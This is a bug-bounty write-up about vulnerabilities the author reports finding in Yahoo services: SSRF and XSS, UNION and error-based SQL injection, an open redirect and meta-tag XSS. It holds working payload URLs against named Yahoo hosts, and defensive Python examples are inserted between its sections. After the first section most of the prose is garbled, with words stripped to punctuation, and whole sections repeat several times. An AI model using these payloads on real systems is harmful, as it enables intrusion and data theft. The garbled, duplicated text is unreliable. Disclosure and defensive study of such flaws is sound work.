
Three hundred and ninety-four dollars

In this article I want to share my experience of taking part in Yahoo's bug bounty program (and not only Yahoo's). I'll describe which vulnerabilities I found, which difficulties I ran into, and how generous Yahoo turned out to be. See you under the cut!

Yahoo Bug Bounty


I have been interested in information security for quite some time (since around 2007). An inner decision I try to stick to is that it stays my hobby, because I do not want something that gives such a charge of adrenaline to turn into a routine. But hobbies differ. A little less than a year ago I decided to come out of the underground. I went to PHDIII and took an honorable fourth place in the "WAF Bypass" contest. My personal opinion: I took it only because I was the fourth and last person who sent in at least one key in that contest :). I took part in the online and offline stages of the Symantec Cyber Readiness Challenge, where, to my surprise and pleasure, I ended up in the top ten. In general, I showed myself and had a look at smart people. But all of that only satisfies the fourth level of Maslow's pyramid, and I, like any living person, want to eat. And the underlying wish for my hobby to bring not only pleasure but also money turned into an obsessive idea.
The turning point came after reading Sergey Belov's post, Favorites: IT security links, where I stumbled on an obvious thing that for some reason I had not figured out myself: a link to a list of open Bug Bounty programs. Besides the obvious programs from Yandex, Google and Facebook, many others were listed there. Read, done.

At first I chose the reward program of "American phones and payphones". Two sleepless weeks, it seemed to me, were not in vain: about 30 bug reports, including SQLi on services of varying severity, changing the password of any user, and much more. But after two weeks of semi-automatic replies of the form "We heard you. You will be contacted in the near future", I wondered: how soon is "soon"? I wandered through the forums, and an unpleasant picture emerged. They answer slowly, veeeery slowly. With a declared top payout of $5,000, real pennies are paid. And in general the community has a very negative opinion of this reward program. It was at that moment that my laptop, with my current work that I had not backed up, burned out. I took it as a sign of fate and made a willful decision: "I have not lost enough sleep to keep sending reports without seeing any feedback." At the moment the situation is not so bad: they confirmed 9 vulnerabilities. True, the selection is not at all obvious: the dates vary, the severity levels vary. And, most importantly, a lottery now awaits me: only the ten best for the quarter get paid. The rest just get a thank-you. I cannot say more at the moment, because the status of even the confirmed bugs is completely unclear.

But let's go back: it was just the middle of November, and I was looking for a new victim. My interest in taking part in such programs was fueled by a reply from Telekom.de, where they thanked me for reporting a vulnerability. And although my report was a duplicate, they very much wanted to send me 50 euros for my efforts and were waiting for my details.

Telekom.de Bug Bounty

And then I stumbled on a flurry of tweets, posts and likes under the general heading "Yahoo will stop sending T-shirts paid for out of the security director's own pocket and officially opens its bug bounty program". I quickly found a link to the program, which opened on November 1, 2013. Since February 1, 2014 they have been working with HackerOne, and reports now have to be sent there. I was hoping that, on the one hand, a major search engine would not stall for six months and, on the other hand, that at the very start one could skim off the cream. I'll say right away: my expectations were met. Now, in order.

I spent the first few days on the scientific method of poking at things. I have my own empirical methods: what to look for, where to look. And I also simply had to look around.

Part one. XSS at tw.m.yahoo.com.

On the fourth day of my poking around I came across the first URL ( http://tw.m.yahoo.com/w/twstock/news_content.php?url=http://twstock.yahoo.com/w/news_content/url/d/a/140210/2/49cvs.html&.ts=1384478129&.int=tw&.lang=zh-hant-tw ). Initial tests showed I was heading in the right direction. Naturally, I noticed the url parameter.
- "Maybe an iframe?" I thought.
But no, it was a genuine server-side request. How it works:
1. The script takes the url parameter.
2. It requests it; in reality the target is a JSON container ( http://tw.stock.yahoo.com/w/news_content/url/d/a/140210/2/49cvs.html ).
json container
{
  "headline": "\u5f71\u97ff\u5e02\u5834\u7684\u807d\u8b49\u6703\u5373\u5c07\u4f86\u5230Fed\u4e3b\u5e2d\u8449\u502b\u6210\u70ba\u7126\u9ede",
  "pageUrl": "http:\/\/tw.stock.yahoo.com\/news_content\/url\/d\/a\/140210\/2\/49cvs.html",
  "provider": {
    "cobrand_logo": "http:\/\/tw.yimg.com\/i\/tw\/stock\/revamp\/cnyes_logo_130_30.gif",
    "cobrand_name": "\u9245\u4ea8\u7db2",
    "cobrand_url": "http:\/\/www.cnyes.com\/",
    "english_name": "cnYES.com",
    "legal_name": "\u9245\u4ea8\u7db2",
    "title": "\u9245\u4ea8\u7db2"
  },
  "date": "20140211",
  "unixtime": "1392058608",
  "author": "\u7de8\u8b6f\u90ed\u7167\u9752",
  "summary": "\u65b0\u4efb\u806f\u6e96\u6703(Fed)\u4e3b\u5e2d\u8449\u502b\u672c\u5468\u5c07\u9996\u5ea6\u5728\u570b...",
  "coverStory": "Y",
  "source": "\u9245\u4ea8\u7db2",
  "category": "N10",
  "paragraphs": ["..."],
  "stockId": [],
  "images": [],
  "tables": []
}

3. It builds the page out of all of this.
I immediately got the idea to replace the URL, and to make the request not only to a different domain but also to a different port:
http://tw.m.yahoo.com/w/twstock/news_content.php?url=http://example.com:6666/nonexist

On the server side we get:
nc -lvv 6666
Connection from 202.43.194.189 port 6666 [tcp/ircu-2] accepted
GET /nonexist HTTP/1.1
Host: example.com:6666
Accept: */*

Judging by the headers, this looks very much like cURL (as became clear later, with CURLOPT_FOLLOWLOCATION turned off). After that I checked which protocols were allowed:
- work: http, https;
- do not work: ftp, gopher, tftp, ldap, dict, ssh2, file, telnet, smtp, mailto, pop3, imap;
- redirects via Location do not work.
The result was an SSRF of very limited use.
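The proxy described above already limits the scheme to http/https and does not follow redirects, but it still fetches any host on any port. The following is an added example (not code from the article or from Yahoo) of the server-side check a defender would add in front of such a fetch: scheme, host allow-list, no userinfo, default port only. The allowed host names are assumptions for the example.

```python
from urllib.parse import urlsplit

# Hosts the news-content proxy is allowed to fetch from.
# Assumption for this example; a real deployment would list its own content origins.
ALLOWED_HOSTS = {"tw.stock.yahoo.com", "twstock.yahoo.com"}
DEFAULT_PORTS = {"http": 80, "https": 443}


def check_fetch_url(url: str) -> tuple:
    """Decide whether a user-supplied `url` parameter may be fetched server-side.

    Returns (allowed, reason). Arbitrary hosts and arbitrary ports, which the
    write-up shows the proxy accepting, are rejected before any request is
    made. Redirects must still be disabled in the HTTP client itself, because
    this check only covers the first hop.
    """
    try:
        parts = urlsplit(url)
    except ValueError as exc:  # e.g. malformed IPv6 brackets
        return False, f"unparseable url: {exc}"

    scheme = parts.scheme.lower()
    if scheme not in DEFAULT_PORTS:
        return False, f"scheme not allowed: {scheme or '(none)'}"

    # user@host forms are a classic way to confuse naive host checks
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"

    host = parts.hostname
    if host is None:
        return False, "missing host"
    if host.lower() not in ALLOWED_HOSTS:
        return False, f"host not allowed: {host}"

    try:
        port = parts.port  # raises ValueError for non-numeric or out-of-range ports
    except ValueError:
        return False, "invalid port"
    if port is not None and port != DEFAULT_PORTS[scheme]:
        return False, f"non-default port not allowed: {port}"

    return True, "ok"
```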

Then the sensible move was to save the source file and request it:
http://tw.m.yahoo.com/w/twstock/news_content.php?url=http://example.comt555/content_spoofed.html
Voilà, we have content spoofing. But if we have content spoofing, it would be a sin not to try for XSS. I began experimenting with the parameters, but... they were well validated. The first bell was replacing the cobrand_url parameter with:
 javascript:alert('xss') 

Everything worked, but waiting for a click from the user is not the best option. Although in the report I did suggest using a naked girl or a sad cat as the image.
I kept testing the parameters and made the following substitution:
 "category":"N10\"" 

(an escaped double quote). I got a very unexpected error stack trace (unfortunately I did not save it). The gist was that some Blueprint could not properly process and render what had been slipped to it. What is that? First time I had seen it. Off to Google, and I find that there is a magic modifier "w-raw":
http://tw.m.yahoo.com/w-raw/twstock/news_content.php?url=http://twstock.yahoo.com/w/news_content/url/d/a/140210/2/49cvs.html
which shows the source of the template (as I understood it) before rendering. It became clear what got mangled, and how, when the data was assembled before output. Moreover, it became clear that I could change the structure of the source itself by adding my own markup. Then I googled a bit more, looked at the source of various pages through w-raw a bit more, googled a bit more... and found this funny construction in the Blueprint source:
<custom-ad mediatype="text/html"><![CDATA[<img src='http://csc.beap.bc…… /> ]]></custom-ad>

At the same time, the CDATA content was output to the page unchanged. Looks like just what we need.
By trial and error I found the right payload:
 "legal_name":"legal_name<\/block><module><custom-ad mediatype=\"text\/html\"><![CDATA[<img src='asdfasdf' onerror=\"alert('xss')\"><script>alert('xss2')<\/script>]]><\/custom-ad><\/module><block>" 

Both vectors worked, and that was actually it.
, XSS.
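The root cause of both vectors above is that JSON values from the fetched document are placed into the Blueprint template as markup rather than as text, so a value can close the surrounding block and open a custom-ad CDATA section. As an added example (not Yahoo's code; the template language is modelled here as plain markup in Python), this renders the same fields with each value escaped at the point of insertion and with cobrand_url restricted to http(s), using the write-up's own payloads as constructed input.

```python
import html
import json
from urllib.parse import urlsplit

# Constructed sample mirroring the fields of the JSON container in the write-up,
# with the attacker-controlled values taken from the write-up's payloads.
SPOOFED_JSON = json.dumps({
    "headline": "Fed hearing",
    "provider": {
        "cobrand_url": "javascript:alert('xss')",
        "legal_name": ("legal_name</block><module><custom-ad mediatype=\"text/html\">"
                       "<![CDATA[<img src='asdfasdf' onerror=\"alert('xss')\">"
                       "<script>alert('xss2')</script>]]></custom-ad></module><block>"),
    },
    "category": "N10\"",
})


def esc(value) -> str:
    """HTML-escape a value, including both quote characters."""
    return html.escape(str(value), quote=True)


def safe_url(value: str) -> str:
    """Keep only http(s) links with a host; javascript:, data: etc. become '#'."""
    parts = urlsplit(value)
    if parts.scheme.lower() in ("http", "https") and parts.hostname:
        return esc(value)
    return "#"


def render_block(raw_json: str) -> str:
    """Build the markup fragment the template would emit from the JSON container.

    Every untrusted string is escaped at the moment it is placed into markup,
    so no value can close the enclosing <block> or open a <custom-ad> section,
    and the link attribute only ever receives an http(s) URL.
    """
    data = json.loads(raw_json)
    provider = data.get("provider", {})
    return (
        "<block>"
        f"<h1>{esc(data.get('headline', ''))}</h1>"
        f"<a href='{safe_url(str(provider.get('cobrand_url', '')))}'>"
        f"{esc(provider.get('legal_name', ''))}</a>"
        f"<span class='cat' data-cat='{esc(data.get('category', ''))}'></span>"
        "</block>"
    )


def has_breakout(fragment: str) -> bool:
    """Crude check on rendered output: did any raw tag or script URL from a value survive?"""
    markers = ("<custom-ad", "<script", "<img", "javascript:", "<![CDATA[")
    return any(m in fragment for m in markers)
```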

Part two. SQLi at *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .

:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1

.

:
SQLi at *.sports.yahoo.com
SQL . .

Part three. Open redirect at m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED

, , : " ?!". Yahoo 394 .

Part four. SQLi at hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .

, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928

Part five. XSS at info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390

- , . - .
XSS at info.yahoo.com
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .

.
, Yahoo. . . , .

.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
SQLi and XSS are off.
, , . , , .

, , , , , -10 Yahoo - Wall of Fame .

- : hackerone.com/4lemon .

PS. . . , HackerOne , . - Yahoo 10 .
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .

:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.

:
SQLi at *.sports.yahoo.com
SQL . .
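The week= probe quoted above (0 union select 1,2,3 -- and 1=2) works only because the parameter is spliced into the statement as text. As an added example, not the site's code, the following reproduces the two behaviours against an in-memory SQLite table with made-up names: the concatenated query returns the attacker-chosen row, while the version that type-checks the value and binds it as a parameter never lets SQL syntax reach the engine.

```python
"""String-built SQL versus a bound parameter for a numeric week= value (added example)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed fantasy-racing table standing in for the real one."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE picks (week INTEGER, driver TEXT, share REAL)")
    con.executemany(
        "INSERT INTO picks VALUES (?, ?, ?)",
        [(35, "Driver A", 0.41), (35, "Driver B", 0.27), (34, "Driver A", 0.39)],
    )
    return con


def picks_vulnerable(con: sqlite3.Connection, week: str):
    """Untrusted value spliced straight into the statement: the bug class on the page."""
    sql = f"SELECT week, driver, share FROM picks WHERE week = {week}"
    return con.execute(sql).fetchall()


def picks_hardened(con: sqlite3.Connection, week: str):
    """Validate the type first, then bind; the engine never sees SQL inside the value."""
    if not week.isdigit():  # the URLs on the page only ever carry small integers here
        raise ValueError("week must be a non-negative integer")
    return con.execute(
        "SELECT week, driver, share FROM picks WHERE week = ?", (int(week),)
    ).fetchall()


def hardened_rejects(con: sqlite3.Connection, week: str) -> bool:
    """True iff the hardened lookup refuses the value instead of querying with it."""
    try:
        picks_hardened(con, week)
    except ValueError:
        return True
    return False


# The probe quoted in the write-up, with the trailing comment swallowing the rest.
PROBE = "0 union select 1,2,3 -- and 1=2"

if __name__ == "__main__":
    con = make_db()
    print("legit, vulnerable:", picks_vulnerable(con, "35"))
    print("probe, vulnerable:", picks_vulnerable(con, PROBE))
    print("legit, hardened:  ", picks_hardened(con, "35"))
    print("probe, hardened rejected:", hardened_rejects(con, PROBE))
```

Two things the vulnerable version illustrates about the write-up's other remarks: the injected SELECT has to match the column count of the original (three here), and filtering individual characters such as < and > does nothing against a payload made of keywords, commas and digits; only binding the value as a parameter removes the problem.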

. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED

, , : " ?!". Yahoo 394 .
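The open redirect comes from the done parameter of the merge form being used as the post-login destination without any check on where it points (and, as the Firebug conversion from POST to GET shows, the fields were accepted from the query string as well). The code below is an added example of how such a parameter should be validated; it is not Yahoo's code, and the default target and allow-listed hosts are assumptions. Only a same-site relative path or an absolute http(s) URL to an allow-listed host is accepted; everything else, including scheme-relative //host forms, backslash variants, userinfo tricks and non-http schemes, falls back to the default.

```python
"""Validating a post-login redirect target such as the `done` parameter (added example)."""
from typing import Optional
from urllib.parse import urlsplit, urlunsplit

DEFAULT_TARGET = "/"
# Hosts the login flow may legitimately hand off to (assumed for this example).
ALLOWED_HOSTS = {"m.yahoo.com", "www.yahoo.com"}


def safe_redirect_target(done: Optional[str], allowed_hosts=ALLOWED_HOSTS) -> str:
    """Return a value that is safe to place in a Location header."""
    if not done:
        return DEFAULT_TARGET
    # Browsers treat "/\evil.example" like "//evil.example"; normalise before parsing.
    candidate = done.replace("\\", "/")
    # Control characters can split headers or hide a scheme from naive checks.
    if any(ord(c) < 0x20 or c == "\x7f" for c in candidate):
        return DEFAULT_TARGET
    parts = urlsplit(candidate)
    # Relative path on this site: exactly one leading "/" ("//x" is scheme-relative).
    if not parts.scheme and not parts.netloc:
        if candidate.startswith("/") and not candidate.startswith("//"):
            return candidate
        return DEFAULT_TARGET
    # Absolute URL: http(s) only, no userinfo, host on the allow-list.
    if parts.scheme.lower() not in ("http", "https"):
        return DEFAULT_TARGET
    if "@" in parts.netloc or parts.hostname is None:
        return DEFAULT_TARGET
    if parts.hostname.lower() not in allowed_hosts:
        return DEFAULT_TARGET
    # Re-serialise from the parsed parts so what we emit is exactly what we validated
    # (forces https, drops any port and fragment).
    return urlunsplit(("https", parts.hostname.lower(), parts.path or "/", parts.query, ""))


if __name__ == "__main__":
    for sample in ["", "/w/ygo-frontpage", "http://example.com", "//example.com/x",
                   "javascript:alert(1)", "http://m.yahoo.com/w/ygo-frontpage?.intl=us"]:
        print(f"{sample!r:48} -> {safe_redirect_target(sample)}")
```

Two design points: the result is rebuilt from the parsed components rather than echoing the input, so parser/browser disagreements about odd inputs cannot resurface after validation, and the decision is an allow-list of hosts, not a block-list of suspicious strings. Reading the field only from the POST body (the $_POST versus $_REQUEST distinction the write-up draws) is a separate, complementary hardening.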

. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .

, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928

, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390

- , . - .
XSS at info.yahoo.com
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .

.
, Yahoo. . . , .

.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
SQLi and XSS are off.
, , . , , .

, , , , , -10 Yahoo - Wall of Fame .

- : hackerone.com/4lemon .

PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.

. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .

:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.

:
SQLi at * .sports.yahoo.com
SQL . .

. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED

, , : " ?!". Yahoo 394 .

. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .

, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928

, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390

- , . - .
XSS at info.yahoo.com
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .

.
, Yahoo. . . , .

.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
SQLi and XSS are off.
, , . , , .

, , , , , -10 Yahoo - Wall of Fame .

- : hackerone.com/4lemon .

PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.

. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
